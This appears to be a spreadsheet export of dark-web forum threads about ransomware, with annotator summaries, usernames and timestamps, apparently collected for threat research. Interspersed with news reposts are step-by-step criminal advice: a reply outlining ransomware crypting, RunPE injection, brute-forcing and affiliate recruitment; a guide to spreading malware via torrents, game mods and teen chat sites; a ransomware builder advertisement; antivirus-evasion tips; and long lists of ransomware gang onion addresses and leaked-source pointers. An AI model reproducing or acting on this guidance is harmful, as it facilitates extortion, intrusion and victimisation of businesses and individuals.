    <t>the team behind exploit, a major cybercrime forum used by ransomware gangs to hire affiliates and advertise their ransomware-as-a-service (raas) services, has announced that ransomware ads are now banned and will be removed.;;the move follows the announcement made by the xss russian-speaking hacking forum yesterday about ransomware topics being permanently banned.;;exploit says the decision was taken because ransomware groups attacking targets indiscriminately attracts "a lot of attention.";;besides the ban, the forum admins will also remove all topics related to ransomware operations and all affiliate programs.;;ransomware gangs have already expressed their disapproval after xss posted their decision to ban them from the forums. for instance, the revil ransomware gang announced that the operation will move to exploit.;;revil added that the gang will move onto a private platform within a week. however, they will have to be a lot faster since exploit also banned ransomware topics to evade unwanted attention from us law enforcement.;;with more cybercrime and hacking communities pushing ransomware operations off their platforms, it remains to be seen how and if raas gangs will keep promoting their activities and recruiting new affiliates.;;exploit and xss respond to increased pressure on raas gangs who have previously used the two forums, including revil, lockbit, darkside, netwalker, and nefilim.;;this is a direct result of them landing in the crosshairs of law enforcement after darkside ransomware's attack on colonial pipeline, which disrupted the us fuel pipeline's operation.;;the attack was also addressed by the white house in this week's national security briefings and prompted a regional emergency declaration affecting 17 states and the district of columbia.;;after the incident, the darkside ransomware gang posted a "press release" stating that they are apolitical and that they will start vetting all targets before attacks.;;colonial pipeline has since restored all pipeline operations after reportedly paying darkside almost $5 million worth of cryptocurrency for a decryption key.;;unkn, a threat actor known as the public-facing representative of rival ransomware gang revil, also announced today that the darkside raas operation shut down after losing access to public data leak site, payment servers, and cdn servers "at the request of law enfocement agencies," and having their cryptocurrency transferred to an unknown wallet.;;darkside confirmed unkn's claims in a message sent to their raas affiliates saying that they decided to close their operation "due to the pressure from the us" and losing access to their public-facing servers.;;after darkside's shutdown, revil announced new restrictions on targets that can be encrypted by affiliates.;;unkn said that revil affiliates are now required to obtain permission before targeting an organization and that:;;1. work in the social sector (health care, educational institutions) is prohibited;;2. it is forbidden to work on the gov-sector (state) of any country;</t>
  </si>
  <si>
    <t>Post stating that exploit (a notable forum for ransomware gangs) is not longer allowing ransomware posts / conversations or soliciting due to the attention ransomware is bringing</t>
  </si>
  <si>
    <t>15/05/2021 16:22</t>
  </si>
  <si>
    <t>f1421231df2d668c3eac</t>
  </si>
  <si>
    <t>Ransomware ads now also banned on Exploit cybercrime forum</t>
  </si>
  <si>
    <t>{'darkside': 4, 'revil': 3, 'ransomware': 10, 'raas': 4}</t>
  </si>
  <si>
    <t>hello community,;;i am currently learning all i can about all things ransomware. been putting in quite a bit of research but have hit a bit of a snag. does anyone here know of any ransomware focused forums? even better, if you happen to know the actual onion addresses for some of the more current raas programs, please do share! specifically: gandcrab, princess evolution, and earth. i just can't seem to get past the surface level when it comes to my findings.;;thanks much and, as always, keep on keepin' on.</t>
  </si>
  <si>
    <t>User if there are any good ransomware forums</t>
  </si>
  <si>
    <t>/u/MisterDoctor</t>
  </si>
  <si>
    <t>13/09/2018 16:32</t>
  </si>
  <si>
    <t>759bb6e5833153db084b</t>
  </si>
  <si>
    <t>Ransomware and RaaS</t>
  </si>
  <si>
    <t>what is the best course available to perform ransomware attack?</t>
  </si>
  <si>
    <t>User asking what is the best course of action when performing a ransomware attack</t>
  </si>
  <si>
    <t>/u/qwertyasian</t>
  </si>
  <si>
    <t>24/02/2021 12:31</t>
  </si>
  <si>
    <t>121b9b162cdca1885930</t>
  </si>
  <si>
    <t>Ransomware attack best course?</t>
  </si>
  <si>
    <t>2 days 10:39:00</t>
  </si>
  <si>
    <t>selecting targets that are relatively easy and keeping the ransomware payments low so people are more inclined to pay for their data back then to walk away.</t>
  </si>
  <si>
    <t>24/02/2021 20:47</t>
  </si>
  <si>
    <t>0 days 08:16:00</t>
  </si>
  <si>
    <t>depends on your skillset and the depth of your pockets. you need the ransomware itself, a loader which deploys it, traffic, and network access with the knowledge on how to move inside laterally. in sophisticated operations each of these parts are handled by specialists. custom-made loader with a ransomware module, traffic devs, and actors who specialize in attacking networks and using tools like cobalt strike.;;now, obviously a team like this knows what they're doing and they're going for corps asking for 7-8 figure ransoms. if you don't have such a team you can still employ your own operation. as funshine mentioned, focus on small targets like personal computers hoping they don't have backups and care enough to pay your $50 ransom. every piece of the operation is going to cost you though - renting/buying ransomware/loader, paying for traffic, network access, etc. this is a nice way to familiarize yourself with the low-level ransom scene if you got cash to burn through.;;to save some of that money, try doing the parts yourself, it's a good learning experience! grab a ransomware sample from github and play around with it (in a virtualized environment). build the file and crypt it - use aes or xor encryption and store as base64 to combat st; for rt you inject the bytes into an already running process via runpe class. next is traffic - scan an ip range for open ports, brute-force yourself right in. and then deploy! this is your;poor man's;basic guide.;;another, more;simple;option is to join a ransomware as a service (raas) group. you wont get into the dominating ones without having strong vouches or bringing something really good to the table, but you can apply for the lesser ones. just like a job application you'll be asked about your experience. how it works is you are given an in-house crypted and fully prepared bin. your only job is to spread it. they take a cut and you keep the rest. of course, you have to know how to spread it in the first place - the ability to develop traffic. whether it's smtp spamming, rdps, p2p, social media, google ads, eks - you have to be able to pump those numbers. note that the main gangs like ryuk and egregor are 80% email phishing.;;check out;/d/malware;for more info on this topic!</t>
  </si>
  <si>
    <t>25/02/2021 14:23</t>
  </si>
  <si>
    <t>0 days 12:30:00</t>
  </si>
  <si>
    <t>this is the best reply i have ever read regarding this subject. exactly how i would have replied. you probably even took it a step further. i used to spread my rat's exe back in the day with doc and pdf exploits, same goes for metasploit. i intend running a ransomware campaign soon, so i have recently started learning more about burp suite as i believe it might be better than msf, i am also going to look for an ek with good % to run some traffic through. i am not sure which to get (i am so out of touch with everything atm), i will definitely be working with smtp spamming. at the moment however, i don't know if .doc or .pdf exploits are still worth it.</t>
  </si>
  <si>
    <t>/u/pierrecarding</t>
  </si>
  <si>
    <t>26/02/2021 23:10</t>
  </si>
  <si>
    <t>1 days 08:47:00</t>
  </si>
  <si>
    <t>hey guys... is there a way to deploy a ransomware message before ciphering the server with the commands cipher /e + folder_name when you are exploiting using metasploit??</t>
  </si>
  <si>
    <t>User asking for more information on how to display a ransomware message</t>
  </si>
  <si>
    <t>/u/Ashtar</t>
  </si>
  <si>
    <t>26/09/2022 04:34</t>
  </si>
  <si>
    <t>c09e891f8569aa014afc</t>
  </si>
  <si>
    <t>Ransomware attack using Metasploit</t>
  </si>
  <si>
    <t>offline ransomware ��zeppelin��.;;we took into account all feedbacks and wishes, working with an affiliate program, implemented the planned bells and whistles in file encryption, combined with existing developments and received a completely new product with a universal data processing algorithm. after conducting serious tests, it was decided to build a builder so that everyone who bought a license for our software had a unique opportunity to work regardless of any affiliate program.;;some features of the builder:;;-support for multiple master keys;-saving locker in .exe, .dll and .ps1 (powershell) formats;-options: ip logger / autoload / start of the specified commands on the attacked machine (deleting recovery points) / termination of the processes on the list / auto-unlock of files that are not writable / self-deletion / request for rights / ransom request editor;-saving and resetting settings;-generation of a master decoder for test decryption of files;;a short list of features of the current implen:;;-a strong encryption algorithm that has proven itself to be extremely reliable and unbreakable (custom implementation of aes cbc, without cryptoapi, its own rng is used, brute force is impractical);-installation into the system under a randomly selected name, obtained on the basis of a list of processes running on the system under attack;-using multi-threaded asynchronous file search, where for each drive and network path a separate stream works;-encryption of files with "bands", this guarantees the impossibility of even partial recovery of large files with databases and archives;-the ability to execute arbitrary commands before starting the search and data encryption (deleting recovery points, etc.) // optional;-process completion on the attacked machine according to the list // optional;-automatic termination of processes blocking access to files if they are not available for encryption // optional;-all builds (.exe, .dll and .ps1) function correctly on the entire os line from windows xp to later;;package contents: builder + config + manual.;;we will answer all questions in jabber:;thisiszeppelin@exploit.im;thisiszeppelin@thesecure.biz</t>
  </si>
  <si>
    <t>Zeppelin ransomware builder discussing their progress</t>
  </si>
  <si>
    <t>14/04/2020 20:32</t>
  </si>
  <si>
    <t>3f0a1960735c89177f98</t>
  </si>
  <si>
    <t>Ransomware builder ZEPPELIN</t>
  </si>
  <si>
    <t>need some ransomware code scripts for reverse engineering to understand better its real impact on actual systems... please, share your own codes...</t>
  </si>
  <si>
    <t>User asking for ransomware code scripts to reverse engineer them</t>
  </si>
  <si>
    <t>143780d57c76158da721</t>
  </si>
  <si>
    <t>Ransomware code scripts for reverse engineering</t>
  </si>
  <si>
    <t>0 days 05:30:00</t>
  </si>
  <si>
    <t>where to get find buyers for ransomware corporate data leaks? and how does the data selling process work?;;say for example, a hacker hacked a company and stole large quantity of data. how can the hacker find buyers for such data?</t>
  </si>
  <si>
    <t>User asking where to find buyers for data stolen from ransomware</t>
  </si>
  <si>
    <t>/u/kencyraimondi</t>
  </si>
  <si>
    <t>5c5a88b75ee1294abfc3</t>
  </si>
  <si>
    <t>Ransomware corporate data leaks</t>
  </si>
  <si>
    <t>0 days 00:38:00</t>
  </si>
  <si>
    <t>can anyone point me in the right direction to get some ransomware i can use for deployment?;;i can get businesses to load up a usb in their computers but can't seem to find some good wares to deploy....</t>
  </si>
  <si>
    <t>User asking for ransomware</t>
  </si>
  <si>
    <t>/u/sc0n</t>
  </si>
  <si>
    <t>30/10/2019 18:25</t>
  </si>
  <si>
    <t>9600367e057260afbb6b</t>
  </si>
  <si>
    <t>Ransomware deployment</t>
  </si>
  <si>
    <t>on windows sometimes it works with exploits but it really depends of the developer behind the ransomware. the main way to encrypt the files is to gain admin access, but if you want to encrypt the root os you should target the entire disk and not only files, so you should use exploits to access this easly.</t>
  </si>
  <si>
    <t>User describing how ransomware traverses between systems</t>
  </si>
  <si>
    <t>24/03/2022 10:41</t>
  </si>
  <si>
    <t>a73981fc9e92e6bdd77d</t>
  </si>
  <si>
    <t>Ransomware directory traversal</t>
  </si>
  <si>
    <t>should i use symmetric or asymetric encryption for ransomware?</t>
  </si>
  <si>
    <t>User asking whether to use symetrical or asymetrical encryption for ransomware</t>
  </si>
  <si>
    <t>/u/pieroll101</t>
  </si>
  <si>
    <t>0e81d2bc4be7ca0ddc8c</t>
  </si>
  <si>
    <t>Ransomware encryption</t>
  </si>
  <si>
    <t>4 days 22:11:00</t>
  </si>
  <si>
    <t>asymetric for sure.</t>
  </si>
  <si>
    <t>/u/Sprinkled4Spi</t>
  </si>
  <si>
    <t>0 days 04:01:00</t>
  </si>
  <si>
    <t>try hybrid encryption, encrypt the file with symmetric algorithm &gt; encrypt generated symmetric key with asymmetric algorithm, like (rsa-4096).</t>
  </si>
  <si>
    <t>;;ransomware encryption;;by;/u/pieroll101;���;6 months ago;in;/d/malware;;1 points;���;</t>
  </si>
  <si>
    <t>7a1650f587498a18041c</t>
  </si>
  <si>
    <t>i am looking for a free + open source ransomware as i need to make money as i have been falsely incriminated for a crime that i did not commit and i cannot afford bail;;i am looking for one that optionally has a the ability to send the decryption keys to a c&amp;c server i have checked github and tested a bunch such as raasnet but they are typically detected by microsoft defender;;i have tried basic obfuscation to the payload before compiling to exe but it is still no use;any comments would be greatly appreciated &lt;3</t>
  </si>
  <si>
    <t>User asking for a free ransomware in order to make money to post bail</t>
  </si>
  <si>
    <t>/u/hunterc</t>
  </si>
  <si>
    <t>27/03/2021 22:13</t>
  </si>
  <si>
    <t>29bfe2b8e62f58ad8c07</t>
  </si>
  <si>
    <t>Ransomware first timer</t>
  </si>
  <si>
    <t>186 days 05:43:00</t>
  </si>
  <si>
    <t>this doesnt exist unfortunately. anything that is open source is already going to be picked up by security researchers/av companies so will be picked up instantly by windows defender.;;writing proper ransomware that works is really hard and has a huge pay off if it does work well. theferore no  one is going to give you anything that works properly and have you blow it by accidentally sending a sample.;;i'd suggest trying something else like scamming if you need cash quick.</t>
  </si>
  <si>
    <t>30/03/2021 18:51</t>
  </si>
  <si>
    <t>2 days 20:38:00</t>
  </si>
  <si>
    <t>python scripts are harder to develop a signature against for av databases. simply refactor the source a little bit and you'll wipe any sigs off. scripts are harder to develop sigs on as opposed to compiled software.;;;a cool project exists called raasnet [1] which is 'open-source ransomware as a service for linux, macos and windows'.;;source:;/post/176d79d47c3531193bcb;#c-3327574723e929fee1</t>
  </si>
  <si>
    <t>30/09/2021 03:56</t>
  </si>
  <si>
    <t>182 days 06:51:00</t>
  </si>
  <si>
    <t>ever since two prominent russian-speaking cybercrime forums banned ransomware-related topics [1, 2], criminal operations have been forced to promote their service through alternative methods.;;at least two ransomware gangs in need of hackers to run the attacks have been using their sites to advertise features of their encryption tools to attract new recruits.;;about a week ago, lockbit ransomware gang announced a new major version for their tool, claiming significant improvement for the encryption speed.;;to support their claim, the threat actor apparently tested versions of multiple ransomware pieces and published their measurements for file encryption speed.;;with launching lockbit 2.0, the ransomware developers also announced a new affiliate recruitment session, highlighting that the encryption they use has not faltered since the operation started in september 2019.;;���the only thing you have to do is to get access to the core server, while lockbit 2.0 will do all the rest. the launch is realized onevices of the domain network in case of administrator rights on the domain controller,��� says the lockbit ransomware gang;;to attract partners, lockbit claims to offer the fastest encryption and file-stealing (stealbit) tools ���all over the world.���;;this move from lockbit comes after the actor in late may tried to get ransomware talks back on a popular russian-speaking forum by proposing a private section only for ���authoritative users, in whom there is no doubt.���;;while one user thought this to be a good idea, they also pointed out that the ransomware topic ���is now better known than isis terrorists,��� meaning that the forum would get unwanted attention.;;another gang promoting their ransomware-as-a-service (raas) operation on their website recently is himalaya, an actor that started its activity this year.;;except for using their site to spread the word, himalaya does not seem any different than other ransomware programs. they advertise a 70% commission fornd compiled fud [fully undetectable]��� file-encrypting malware.;;as seen from the announcement below, himalaya lays out a strict rule about the targets and apparently does not allow attacking healthcare, public, and non-profit organizations.;;while bleepingcomputer knows of just lockbit and himalaya to actively advertise their raas operation on their websites at the moment, other ransomware gangs could adopt the tactic if it proves successful.;;threat intelligence company kela says that not all ransomware groups are this loud in their search for affiliates, though.;;the revil gang, for instance, prefers to operate discretely and relies on its network of affiliates and connections to get new partners when they need them, kela says.;;in mid-may, immediately after ransomware got banned on one forum, the revil group announced that they would carry their activity in private.;;other prominent groups are likely to keep their head low considering the active hunt for ransomware actors that intensified after darencrypted colonial pipeline systems, disrupting fuel distribution in the u.s., especially on the east coast.</t>
  </si>
  <si>
    <t>Post describing how most ransomware gangs are making thier own recruitement websites</t>
  </si>
  <si>
    <t>29/06/2021 12:20</t>
  </si>
  <si>
    <t>d9f75da95e29c9ff28b6</t>
  </si>
  <si>
    <t>Ransomware gangs now creating websites to recruit affiliates</t>
  </si>
  <si>
    <t>6 days 09:46:00</t>
  </si>
  <si>
    <t>{'raas': 1, 'lockbit': 7, 'revil': 2, 'ransomware': 12, 'darkside': 1}</t>
  </si>
  <si>
    <t>lockbit's onion is listed here - http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion/;;haven't looked for himalaya's yet tho someone else might be along first with their address</t>
  </si>
  <si>
    <t>29/06/2021 23:05</t>
  </si>
  <si>
    <t>0 days 01:00:00</t>
  </si>
  <si>
    <t>i have tried looking himalaya but it shows egalyty raas . curious if they changed names</t>
  </si>
  <si>
    <t>4 days 22:38:00</t>
  </si>
  <si>
    <t>it seems impossible to contact lockbit as they banned all their jib and tox as not authorized, anyone know how to get in touch with them?</t>
  </si>
  <si>
    <t>/u/furzbang</t>
  </si>
  <si>
    <t>1 days 00:23:00</t>
  </si>
  <si>
    <t>http://ranswikiif2mir7mnnscyrsvppxmwwqrvc43fhtddvtnmhedkj4hopyd.onion/;;some helpful dude at raidforums made it. javascript is required which is shit, but it seems benign to me... and really useful to have someone keep an up to date list!</t>
  </si>
  <si>
    <t>Information post</t>
  </si>
  <si>
    <t>18/04/2021 05:26</t>
  </si>
  <si>
    <t>a3cac59d60201d13f06e</t>
  </si>
  <si>
    <t>Ransomware group leak sites, all in one place</t>
  </si>
  <si>
    <t>12 days 19:29:00</t>
  </si>
  <si>
    <t>thanks this is usefiul and interesting read. nice catch!</t>
  </si>
  <si>
    <t>/u/oX2SoiixLIQtx1</t>
  </si>
  <si>
    <t>22/04/2021 04:10</t>
  </si>
  <si>
    <t>3 days 22:44:00</t>
  </si>
  <si>
    <t>does anyone here have any idea where one can find a list of the ransomware group websites such as avaddon, dopplemayer etc. i tried looking up some of these ransomware group sites with duckduckgo search engine and didnt find anything..help please?</t>
  </si>
  <si>
    <t>Post asking for a list of ransomware group websites</t>
  </si>
  <si>
    <t>/u/Quantum01</t>
  </si>
  <si>
    <t>25/09/2020 10:48</t>
  </si>
  <si>
    <t>d14c3c3fafebe8f9cd3f</t>
  </si>
  <si>
    <t>Ransomware group websites</t>
  </si>
  <si>
    <t>25/09/2020 10:33</t>
  </si>
  <si>
    <t>504df67f6a0e7d5db72c</t>
  </si>
  <si>
    <t>Ransomware groups site</t>
  </si>
  <si>
    <t>1 days 19:37:00</t>
  </si>
  <si>
    <t>someone recently asked about ransomware leak sites i can not recall whether it was here in;/d/hacking;or;/d/malware;i'm sorry i can't get the particular sub but here's a list i bumped into.;;http://hxt254aygrsziejn.onion/ -- nefilim ransomware;http://darksidedxcftmqa.onion/ -- darkside ransomware;http://egregoranrmzapcv.onion/ -- egregor ransomware;http://p6o7m73ujalhgkiv.onion/ -- ragnar_locker ransomware;37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion --ako;nbzzb6sa6xuura2z.onion -- suncrypt;wqmfzni2nvbbpk25.onion/partners.html -- mespinoza/pysa;jzfg2tduxqfi7kg4dniwpwd4hrzksz6l6hcaet2tl6agtczhxffhxhqd.onion -- light;darksidedxcftmqa.onion/blog --darkside;rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion -- netwalker;msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion -- prolock/pwndlocker:;ranionjgot5cud3p.onion -- ranion;dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion -- revil/sodinokibi;http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion/ - pay2key;http://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion/ - ransomexx;;avaddon;--------------;avaddongun7rngel.onion --;avaddon.info;avaddongun7rngel.onion/disclosed;;cl0p;--------;ekbgzchl6x2ias37.onion;outside-service.com;;conti/ryuk;-----------------;htcltkjqoitnez5slo7fvhiou5lbno5bwczu7il2hmfpkowwdpj3q2yd.onion;conti.news;dnfrletpaf2l6kcd.onion;kowwdpj3q2yd.onion;ylszpcqfel7joif.onion;fylszpcqfel7joif.onion;hxxps://continews.best;fylszpcqfel7joif.onion/news;;doppelpaymer;----------------------;doppleleaks.info;doppleshare.top;dopplenews.xyz;hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion;;egregor;------------;egregorwiki.top;wikiegregor.top;egregoranrmzapcv.onion;egregor4u5ipdzhv.onion;egregor.top;;lockbit;------------;lockbitkodidilol.onion;lockbitks2tvnmwk.onion;lockbit-blog.com;;maze;---------;45.141.86.137;newsmaze.top;mazenews.top;dnspexdevfbct2agyu3oxrmhm4ggf4ec6iwpnlb3kwb2rigrtuz3sayd.onion;xfr3txoorcyy7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onion;;mountlocker;-------------------;mountnewsokhwilx.onion;cbtucyny2z53bievhlz3rgavup3vqilryzhxpjaa35sw25p4k6742iad.onion;;nemty;----------;zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion;nemty.top;nemty2.top;;sekhmet;--------------;sekhmet.top;rlmuybcg5h5gaatr.onion;sekhmetleaks.top;;snatch;----------;snatch24uldhpwrm.onion;snatchwezarcr27t.onion;snatch6brk4nfczg.onion;snatchh5ssxiorrn.onion;snatch2q72f2wjff.onion;snatch6rpvi7yy4t.onion;mydatassuperhero.com;mydatasuperhero.com</t>
  </si>
  <si>
    <t>List of ransomware link sites</t>
  </si>
  <si>
    <t>22/03/2021 19:45</t>
  </si>
  <si>
    <t>fa503648825a131481a3</t>
  </si>
  <si>
    <t>Ransomware leak sites</t>
  </si>
  <si>
    <t>84 days 13:52:00</t>
  </si>
  <si>
    <t>ransomware groups wiki;;http://edteebo2w2bvwewbjb5wgwxksuwqutbg3lk34ln7jpf3obhy4cvkbuqd.onion/</t>
  </si>
  <si>
    <t>/u/Kickass</t>
  </si>
  <si>
    <t>22/03/2021 22:10</t>
  </si>
  <si>
    <t>0 days 02:25:00</t>
  </si>
  <si>
    <t>nefilim's website is down? does anyone have an alternative link?</t>
  </si>
  <si>
    <t>/u/5MeterMauern</t>
  </si>
  <si>
    <t>23 days 10:30:00</t>
  </si>
  <si>
    <t>does anyone have links to the newer epsilon red, prometheus, and grief ransomware strains?</t>
  </si>
  <si>
    <t>/u/spodermon93</t>
  </si>
  <si>
    <t>15/06/2021 09:37</t>
  </si>
  <si>
    <t>2 days 17:42:00</t>
  </si>
  <si>
    <t>dive brief:;;ransomware operators of revil, also known as sodinokibi, are auctioning stolen data, according to a site they launched on the dark web with similarities to ebay, reports bleeping computer;in the past, revil published stolen data when ransoms went unpaid. the shift to selling information is the hacking group's "first ever stolen data auction," reports brian krebs, cybersecurity journalist.;the data is reportedly linked to an agricultural production company based in canada and a food distributor in the u.s., according to bleeping computer. between the two companies, the hacker group reportedly has at least three databases and upwards of 22,000 files available for auction. initial bids start between $50,000 and $200,000.;;dive insight:;;revil is reshaping the cybercriminal methodology behind traditional ransomware attacks. the revil operators are prolific, with zero indication of restraining attacks.;;in the last year, the ransomware strain was linked to cyberattacks at least 23 texas municipalities, 400 u.s. dental offices, managed service provider cyrusone and an it service provider for dentist offices, complete technology solutions.;;revil hit travelex at the end of 2019, and the company paid its hackers about $2.3 million in ransom. the initial spread of the virus took down travelex's websites globally and recovery took about a month.;;the hacking group, when publishing data of companies that refuse to pay the ransom, posts previews of stolen data on its blog, "happy blog." the group already teased data linked to one of its more recent victims, law firm grubman shire meiselas &amp; sacks, which has a celebrity client list. the hacking group claims to have information on president donald trump, offering it with a $1 million price tag, according to bleeping computer.;;revil's operations have similarities to maze and gandcrab. gandcrab's operators are likely the ones behind revil, after announcing their "retirement" in may 2019 and revil's debut about a month later.;;the economic downturn caused by covid-19 is pressuring companies to avoid paying a ransom and try to save money. "this may be a way for revil operators to recoup costs of operations," said josh smith, security analyst at nuspire, in an emailed statement to cio dive.;;the hacker group is allowing its bids to determine demand. "this appears to be the next evolution of public dumping," said smith.</t>
  </si>
  <si>
    <t>Post describing how revil is authioning stolen data and the data they are auctioning</t>
  </si>
  <si>
    <t>bb6f0e113ddcd923ba3c</t>
  </si>
  <si>
    <t>Ransomware operators auction stolen data on dark web</t>
  </si>
  <si>
    <t>{'revil': 3, 'ransomware': 2}</t>
  </si>
  <si>
    <t>does anyone know if ransomware is profitable if spread to home desktops / laptops ?;;do home computer users ever pay the ransom or only businesses do?</t>
  </si>
  <si>
    <t>User asking the infrastructure needed to make ransomware profitable</t>
  </si>
  <si>
    <t>/u/trumpanzee</t>
  </si>
  <si>
    <t>25/08/2021 06:02</t>
  </si>
  <si>
    <t>737f172af12795b817f5</t>
  </si>
  <si>
    <t>Ransomware profitable on home computers?</t>
  </si>
  <si>
    <t>0 days 21:25:00</t>
  </si>
  <si>
    <t>probably not.;;it's a dick move anyway.;;i'll help most people on here regardless of my feelings on their intent, but make it clear i think it's shitty and why, but still give a literal up-to-date exact code or shell commands with how to use it.;;ransom malice targeted at individuals with no purpose than a pretty pathetic remuneration is more than uneducated and ill informed, it's borderline on being seriously mentally unwell.;;oricand.;;s'mesc.</t>
  </si>
  <si>
    <t>25/08/2021 08:19</t>
  </si>
  <si>
    <t>0 days 02:17:00</t>
  </si>
  <si>
    <t>and what about ransomware targeted to businesses and corporations? is that "seriously mentally unwell" too ?</t>
  </si>
  <si>
    <t>25/08/2021 08:40</t>
  </si>
  <si>
    <t>hi, what do you guys think its the best programming language for writing ransomware, worms,spyware etc. im currently writing a ransomware in python and as i was coding i tought "what if i do this in c++"? the thing is, i dont know c++ or c#. any tips?</t>
  </si>
  <si>
    <t>User asking for the best language for ransomware</t>
  </si>
  <si>
    <t>/u/sosa23</t>
  </si>
  <si>
    <t>30/06/2022 00:18</t>
  </si>
  <si>
    <t>a1ee1b7d68161d52b8e5</t>
  </si>
  <si>
    <t>Ransomware programming language</t>
  </si>
  <si>
    <t>7 days 18:26:00</t>
  </si>
  <si>
    <t>definitely golang - for speed of execution, also it has fast learning curve.</t>
  </si>
  <si>
    <t>/u/Hunter_Thompson</t>
  </si>
  <si>
    <t>30/06/2022 00:39</t>
  </si>
  <si>
    <t>hello all,;;can anyone recommend and ransomware by name that is;;;1. easy to use;2. works well in 2022;3. is effective;;thanks!!</t>
  </si>
  <si>
    <t>/u/dgkallday5577</t>
  </si>
  <si>
    <t>13/01/2022 03:01</t>
  </si>
  <si>
    <t>25c0d9c4e1127ac61de5</t>
  </si>
  <si>
    <t>Ransomware recommendations?</t>
  </si>
  <si>
    <t>43 days 22:43:00</t>
  </si>
  <si>
    <t>lockbit 2.0</t>
  </si>
  <si>
    <t>26/02/2022 01:44</t>
  </si>
  <si>
    <t>39 days 14:02:00</t>
  </si>
  <si>
    <t>i know it has been done before but at least where i'm from i haven't heard of many cases, so it's like free real estate.;;shortly said, i intend to target some very rich people who have little to no knowledge about security with some ransomware. however, i only know their emails but with some little social engineering it shouldn't be hard to make them download/run an executable.;;what i don't have is the ransomware itself, and i am not even sure which one i need, so if you can suggest me some good ones that would work in my situation, along with a place where i can buy them, it would be great. maybe we can split the bill.</t>
  </si>
  <si>
    <t xml:space="preserve">User asking for some ransomware to target a speciific demographic </t>
  </si>
  <si>
    <t>/u/smartboi</t>
  </si>
  <si>
    <t>13/05/2022 21:51</t>
  </si>
  <si>
    <t>3bf4b28c935904572379</t>
  </si>
  <si>
    <t>Ransomware spearphising</t>
  </si>
  <si>
    <t>6 days 15:08:00</t>
  </si>
  <si>
    <t>spear phishing for the purposes of ransomware is used not to directly spear fish them to open ransomware, but to get initial access to corp vpn ( forti, citrix, sonicwall.... );;from then you are slowly aquiaring acces of entire network, domain admin, switching of security, data looting, and hiting ransomware in the end</t>
  </si>
  <si>
    <t>13/05/2022 22:17</t>
  </si>
  <si>
    <t>pay attention with ransomware to not encrypt your own device and loose access to your data ...before starting!;;stay safe</t>
  </si>
  <si>
    <t>15/05/2022 09:29</t>
  </si>
  <si>
    <t>hi there,;;anyone tried to spam ransomware's through mail spamming campaign. if anyone tried it with fresh leads from new databases or small companies (if you have one that spread over the lan), please let me know how it was. did you make your own html template or you bought it ? what mailer did you use ? did you cracked your own smtp's or you bought it ? did you spoof your domain or you just bought a similar one ?;;please let me know your experience if you did it :)</t>
  </si>
  <si>
    <t>User asking if anyone else has experence with using mail spamming to spread ransomware</t>
  </si>
  <si>
    <t>/u/Zedkar</t>
  </si>
  <si>
    <t>21/06/2021 02:24</t>
  </si>
  <si>
    <t>3615148a54e2940e31c1</t>
  </si>
  <si>
    <t>Ransomware spread</t>
  </si>
  <si>
    <t>0 days 13:31:00</t>
  </si>
  <si>
    <t>don't ransomwear small businesses bro. go after the multinational corporations that are corrupt and willing to pay much more.</t>
  </si>
  <si>
    <t>21/06/2021 07:11</t>
  </si>
  <si>
    <t>0 days 04:47:00</t>
  </si>
  <si>
    <t>what you need:;- a fud server;- a brain;- different accounts (you will know which later);structure of the guide:;1:spreading via torrent;2:spreading via social social engineering;;1: spreading via torrent:;for spreading via torrent is a good binder required.;the easiest way of doing this is too download popular;torrents.;a way of finding out which torrents are popular at the moment, is for;example:;http://thepiratebay.org/top/all;1:choose one and download it;2:bind your virus to it;3:upload to different torrent sites;;the most popular torrent tracker (public):;- kick ass torrents.com;- torrent funk;- isohunt.com;- thepiratbay.org;- btjunkie.org;- (demonoid) /it is a private tracker so you need a invite;- there are many more! you can visit http://netforbeginners.about.com/od/peersharing/a/ torrent_search.htm;;what is important?;- find seeder for your torrent;- write a detailed description;- use pictures;;2: social engineering;this one is my favorite way of spreading.;you have to play with the people's dreams and wishes.;there are many ways to do this. most important is to be creative.;i will show you two as an example now.;gaming:;(there is a high chance of getting steam accounts);there are a lot of gaming forums in the web.;try to upload your virus as a game mod or patch.;http://www.tesnexus.com/;http://www.fallout3nexus.com/http://www.dragonagenexus.com/;chatting :;use websites like http://www.321teenchat.com/;write them that you want to chat with them.;find out what they like. finally send them your link.</t>
  </si>
  <si>
    <t>21/06/2021 08:17</t>
  </si>
  <si>
    <t>if you ransomware small businesses you are the biggest of clowns</t>
  </si>
  <si>
    <t>/u/LarryBird3000</t>
  </si>
  <si>
    <t>21/06/2021 15:08</t>
  </si>
  <si>
    <t>i &lt;3 the sentiment here, and totally agree, dont target small business.  you dont need to, only ever target big companies that take the piss out of employees or destroy the planet, or destroy lives.  noone will complain then, think hearts and minds.</t>
  </si>
  <si>
    <t>21/06/2021 15:55</t>
  </si>
  <si>
    <t>you can download and use my ransomware, available on;/d/redeemer;for free.;it should cover most features people are looking for.;the fee is 20% for decryption.;;don't pay for something that you can get for free.</t>
  </si>
  <si>
    <t>promote ransomware</t>
  </si>
  <si>
    <t>02d0f41b7d0d08570074</t>
  </si>
  <si>
    <t>Ransomware �������� is</t>
  </si>
  <si>
    <t>0 days 04:04:00</t>
  </si>
  <si>
    <t>0 days 22:49:00</t>
  </si>
  <si>
    <t>did you tried in vm before?;how do you trust in the kid blackhat for your payment?;;you should understand all the fckg code first;;pdt did you get or know about conta ramson? the code was published</t>
  </si>
  <si>
    <t>user recommend checking conti ransomeware</t>
  </si>
  <si>
    <t>/u/Ankhknight</t>
  </si>
  <si>
    <t>0 days 03:03:00</t>
  </si>
  <si>
    <t>conti*</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>share*vx-underground*org/conti/</t>
  </si>
  <si>
